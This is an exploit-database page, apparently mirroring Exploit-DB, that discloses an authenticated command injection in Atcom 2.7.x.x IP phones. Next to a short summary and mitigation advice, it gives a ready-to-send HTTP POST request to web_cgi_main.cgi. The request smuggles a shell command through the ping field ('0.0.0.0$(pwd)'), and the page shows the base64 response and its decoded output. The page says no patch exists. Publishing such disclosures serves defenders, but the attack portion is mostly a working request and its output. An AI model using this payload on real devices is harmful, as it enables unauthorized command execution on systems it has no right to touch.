header-logo
Suggest Exploit
vendor:
IP Phone
by:
Mohammed Adel
8.1
CVSS
CRITICAL
Authenticated Command Injection
78
CWE
Product Name: IP Phone
Affected Version From: 2.7.x.x
Affected Version To: All versions above 2.7.x.x
Patch Exists: NO
Related CWE:
CPE: a:atcom:ip_phone:2.7.x.x
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

Atcom 2.7.x.x – Authenticated Command Injection

The Atcom 2.7.x.x version is vulnerable to an authenticated command injection vulnerability. By sending a specially crafted request to the web_cgi_main.cgi script, an attacker can inject arbitrary commands into the system. This can lead to remote code execution and unauthorized access to the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software. Additionally, it is advised to restrict access to the affected endpoint and implement proper access controls.
Source

Exploit-DB raw data:

# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link:
https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux


Exploit Request:

POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web
Configuration", nonce="value_here",
uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",
response="value_here", qop=auth, nc=value_here, cnonce="value_here"

cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping


Response:

{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}

The value of "ping_cmd_result" is encoded as base64. Decoding the
value of "ping_cmd_result" reveals the result of the command executed
as shown below:

ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'

Navigation

Suggest Exploit

Services By CQR